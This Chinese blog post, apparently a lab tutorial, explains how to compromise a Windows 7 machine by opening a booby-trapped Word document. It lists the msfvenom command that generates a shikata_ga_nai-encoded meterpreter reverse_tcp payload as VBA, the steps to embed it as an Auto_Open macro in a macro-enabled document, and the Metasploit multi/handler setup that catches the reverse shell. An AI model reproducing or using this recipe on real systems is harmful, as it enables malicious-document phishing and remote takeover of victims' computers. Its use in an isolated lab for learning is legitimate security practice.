利用word文档获取shell

先把cn_office_professional_plus_2007_dvd_X12-38713.rar上传到win7虚拟上,解压后,安装
然后打开kali生成恶意代码

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.53 LPORT=8888 -e x86/shikata_ga_nai -i 10 -f vba-exe

20250228231943966-1

复制代码从Uuvqcerqez开始到最后,回到win7 打开word点击视图点击宏 宏名为Auto_Open新建文档

20250228232028606-2

复制第一段代码粘贴到上面保存

20250228232102419-3

之后把第二段粘贴到正文保存为启用宏的文档

20250228232133412-4

回到kali配置监听模块

msfconsole
msf5 exploit(multi/browser/java_jre17_driver_manager) > use exploit/multi/handler msf5 
exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set 
LHOST 192.168.1.53 msf5 exploit(multi/handler) > jobs -K msf5 exploit(multi/handler) > exploit

配置好侦听之后我们打开我们制作的word文档,文档一旦打开就会执行payload连接到MSF, 关闭word文档之后session不受影响

20250228232153448-5

20250228232215383-6

成功.

© 版权声明
THE END
喜欢就支持一下吧!
点赞260 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容